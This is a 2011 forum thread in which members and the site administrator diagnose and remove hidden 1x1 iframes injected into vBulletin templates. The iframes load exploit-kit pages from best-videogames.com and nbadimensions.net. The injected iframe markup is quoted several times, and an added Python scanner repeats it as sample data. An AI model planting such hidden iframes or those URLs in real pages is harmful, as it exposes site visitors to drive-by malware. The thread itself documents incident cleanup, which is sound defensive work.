View Full Version : What is best-videogames.com?



JeffW
10-27-2011, 11:29 AM
This url is embedded in the source code of this site, and it's slowing the page load.


http://best-videogames.com/forum/ind.php

Line 58.

</head>

<body>

<div class="above_body"> <!-- closing tag is in template navbar -->

<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>

<div id="header" class="floatcontainer doc_header">

<div><a name="top" href="index.php" class="logo-image"><img src="images/LH-logo.gif" alt="Lansing Heritage Forums - Powered by vBulletin" /></a></div>

<div id="toplinks" class="toplinks">

Don C
10-27-2011, 11:35 AM
I noticed it too. A quick Google informs us that the vBulletin code here has been hijacked and modified to generate page views for some jerk scammer. I don't think that it has anything to do with our computers at this point, just the server that runs the forum software.

1audiohack
10-27-2011, 04:28 PM
Whatever it is, can it be removed? It makes browsing this site on the old iPhone almost intolerable.

hjames
10-27-2011, 06:06 PM
Whatever it is, can it be removed? It makes browsing this site on the old iPhone almost intolerable.

Sure - it's just code - Seems to be a dynamic site, so the bad code can be removed without much grief ...
once the webmaster finds the free time to poke into the code and remove it.

The bigger question is - what do they need to do to harden the site so it doesn't happen again. Kiddie hackers (amateurs) leave footprints like that - serious hackers load vulnerabilities and don't leave signposts to let you know you've been compromised.

Earl K
10-29-2011, 04:38 PM
"nbadimensions.net/sti.ph" is also loading along with (or piggybacking after ) the regular url loads, www.audioheritage.org/vbulletin (http://www.audioheritage.org/vbulletin) > according to my task bar .

:eek:

Earl K
10-30-2011, 05:25 AM
According to my research, the "Best-Videogames.com" is a wrapper of sorts that's run by > "Exploit Blackhole Exploit Kit(type 2065)" (http://malwareint.blogspot.com/2010/09/black-hole-exploits-kit-another.html) on this site.

It seems that browsers running AVG are being warned ( AGAINST ACCESSING THIS SITE ) since this web-site ( LHF ) is still infected .

<> :crying:

Earl K
10-30-2011, 11:12 AM
Here is what is being loaded according to my browser ( in order , I believe ) .

:confused:

Mr. Widget
10-30-2011, 02:26 PM
Funny... I saw the title of the thread and thought it was one more topic I have no interest in, being an avid non-gamer since the dawn of video games.

I'll send a note to Ann and John who take care of our hosting and see if they have the time to deal with it.

Thanks Earl for shooting the note to the moderators.


Widget

Don McRitchie
10-30-2011, 02:52 PM
Hopefully John or Ann can weigh in on this shortly. There is a more recent version of the forum software that I can update to, but I don't want to do this before knowing whether this would overwrite the infection. Otherwise, it could make matters worse.

JeffW
10-30-2011, 04:25 PM
Funny... I saw the title of the thread and thought it was one more topic I have no interest in, being an avid non-gamer since the dawn of video games.

I'll send a note to Ann and John who take care of our hosting and see if they have the time to deal with it.

Thanks Earl for shooting the note to the moderators.


Widget

I have no interest in video games, and it would have never occurred to me to inquire about video games in the "Forum Feedback" forum of this site.

Had I known the moderators didn't actually read this forum, I wouldn't have bothered posting it in the first place.

Mr. Widget
10-30-2011, 04:43 PM
I have no interest in video games, and it would have never occurred to me to inquire about video games in the "Forum Feedback" forum of this site.

Had I known the moderators didn't actually read this forum, I wouldn't have bothered posting it in the first place.

Ouch! :)

Others probably did read it, but a different title would have likely captured my attention. I for one simply don't have the time to read every thread... much less every post.

As it turned out, a click on the "Report Post" button is what called my attention to it. In any event, thanks for bringing it to our attention.


Widget

cantelow
10-31-2011, 06:51 AM
Thanks for the heads-up. I'll try to get rid of that today! :spchless:

Best,
Ann

cantelow
10-31-2011, 10:19 AM
That was an interesting problem. :) Thanks, everyone for the info.

I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:


<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>

<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>


to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

Happily, clearing the malicious links in just these 2 template records clears them out of the whole site. :)

Ann
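An added example, not part of the original thread and not vBulletin's own code: the post above describes finding the injected markup in template records and then looking for "other such links". This sketch generalizes that check from the two known URLs to any off-site iframe that is hidden or sized 0/1 pixel. The template titles, the sample rows, the `video.example` host and the `OWN_HOSTS` allowlist are constructed assumptions; in practice the rows would be exported from the forum's template storage.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link", "meta", "wbr"}
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class HiddenIframeFinder(HTMLParser):
    """Collects the src of off-site iframes that are hidden or 0/1 pixel in size."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts, self.stack, self.found = own_hosts, [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        # An element is hidden if it, or any open ancestor, carries a hiding style.
        parent_hidden = bool(self.stack) and self.stack[-1][1]
        hidden = parent_hidden or bool(HIDDEN_STYLE.search(a.get("style", "")))
        if tag == "iframe":
            host = urlparse(a.get("src", "")).hostname  # None for relative URLs
            tiny = any(a.get(d, "").strip().rstrip("px") in ("0", "1")
                       for d in ("width", "height"))
            if host and host not in self.own_hosts and (hidden or tiny):
                self.found.append(a["src"])
        if tag not in VOID:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the nearest matching open tag; templates are often unbalanced.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def scan_templates(records, own_hosts):
    """records: iterable of (title, html). Returns [(title, iframe_src), ...]."""
    hits = []
    for title, html in records:
        finder = HiddenIframeFinder(own_hosts)
        finder.feed(html)
        hits += [(title, src) for src in finder.found]
    return hits

OWN_HOSTS = {"www.audioheritage.org"}  # assumption: the forum's own hostname
# Constructed rows; titles are placeholders, the iframe markup is quoted from the thread.
SAMPLE = [
    ("header", '<div class="above_body"><div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div><div id="header"><img src="images/LH-logo.gif" alt="logo" /></div>'),
    ("footer", '<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>'),
    ("navbar", '<div id="toplinks" class="toplinks"><a href="index.php">Home</a></div>'),
    ("video", '<iframe src="http://video.example/embed/1" width="560" height="315"></iframe>'),
]
```

Calling `scan_templates(SAMPLE, OWN_HOSTS)` flags the two injected records and leaves the clean navbar and the visible, normally sized embed alone.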

JeffW
10-31-2011, 10:30 AM
Thanks, I can tell a difference already.

Earl K
10-31-2011, 10:40 AM
Thanks Ann

This site loads cleanly now .

:)

Mr. Widget
10-31-2011, 10:48 AM
Thanks Ann. You're the best!


Widget

Don McRitchie
10-31-2011, 11:49 AM
That was an interesting problem. :) Thanks, everyone for the info.

I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:


<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>

<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>


to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

Happily, clearing the malicious links in just these 2 template records clears them out of the whole site. :)

Ann

I'll try and get the forum software updated to the latest version within the next 48 hrs as I suspect that is where the exploit originated to allow access to modify the templates in the mysql database.

Altec Best
11-01-2011, 06:09 AM
That was an interesting problem. :) Thanks, everyone for the info.

I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:


<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>

<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>


to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

Happily, clearing the malicious links in just these 2 template records clears them out of the whole site. :)

Ann

I too would like to Thank You Ann, for fixing it quickly. It's reassuring to know you good Folks are on the ball ! :applaud:




This site loads cleanly now .


Yes it does. Thank You too Earl for the Info & Links ! :applaud:

Much Appreciated ! ;)

Titanium Dome
11-01-2011, 09:05 AM
Thanks, Ann.

JuniorJBL
11-04-2011, 06:33 AM
Thanks to our Hosts here in the Rockies!! :applaud: